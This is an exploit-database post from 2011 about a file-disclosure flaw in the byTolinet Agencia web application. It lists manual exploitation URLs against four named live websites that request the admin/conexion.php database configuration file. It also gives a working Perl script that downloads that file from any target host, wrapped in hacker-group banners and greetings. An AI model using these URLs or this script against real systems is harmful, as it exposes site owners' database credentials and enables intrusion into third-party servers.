byTolinet Agencia File Disclosure

Posted on 01 June 2011
byTolinet Agencia <= Remote 'conexion.php' Disclosure  Exploit
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : Kalashinkov3 <= :)
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : byTolinet Agencia
|~Price : N/A
|~Version : N/A
|~Software: http://www.tolinetagencia.com/
|~Vulnerability Style :  File Disclosure
|~Vulnerability Dir : /
|~Google Keyword : "Designed and Developed byTolinet Agencia
|[~]Date : "31.05.2011"
----------------------------------------------------------
telecharger.php <= 'file' Functions Not Security

<?php
$filen = explode("/", $file);
$numpa = count ($filen);
$fname = $filen[$numpa-1];
..
?>
---------------------------------------------------------
Manual Exploitation |

http://www.adtolima.org/descarga.php?file=admin/conexion.php
http://www.sida-sa.com/descarga.php?file=descarga.php
http://residenciaslafontana.com/descarga.php?file=descarga.php
http://www.ccibague.org/descarga.php?file=descarga.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=============== Automatic Disclosure Exploit (Exploit.PL) =================================================
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title byTolinet Agencia <= Remote 'conexion.php' Disclosure  Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. 

";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ 
";
print "[+] usage2 : perl $0 localhost / 
";
}
print "
************************************************************************
";
print "* byTolinet Agencia <= Remote 'conexion.php' Disclosure  Exploit              *
";
print "* Exploited By : KnocKout                                                  *
";
print "* Contact :   knockoutr[at]msn[dot]com                                 *
";
print "* --                                    *
";
print "*********************************************************************


";
($TargetIP, $path, $File,) = @ARGV;
$File="descarga.php?file=admin/conexion.php";
my $url = "http://" . $TargetIP . $path . $File;
print "
 Az Bekle Sikertiyorum!!! 

";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "conexion.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!

";
print "[+] OPERASYON TAMAM !
";
print "[+] conexion.php Dosyasi Indirildi (conexion.php)
";
print "[+] Indirme Dogrulandi 
";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....

";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !
[!] ".$request->status_line."
";
exit();
}



================================================================

.__        _____        _______
|  |__    /  |  |___  __   _  \_______   ____
|  |    /   |  |  /  /  /_  \_  __ \_/ __ \n|   Y  /    ^   />    <  \_/     | /  ___/
|___|  /\____   |/__/\_ \_____  /__|    \___  >
/      |__|      /      /            /
_____________________________
/   _____/\_   _____/\_   ___ \n\_____    |    __)_ /      /
/         |        \     \____
/_______  //_______  / \______  /
/         /         /
Was Here.


# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
TOP
Malware :

Last 20
Exploits :

Last 20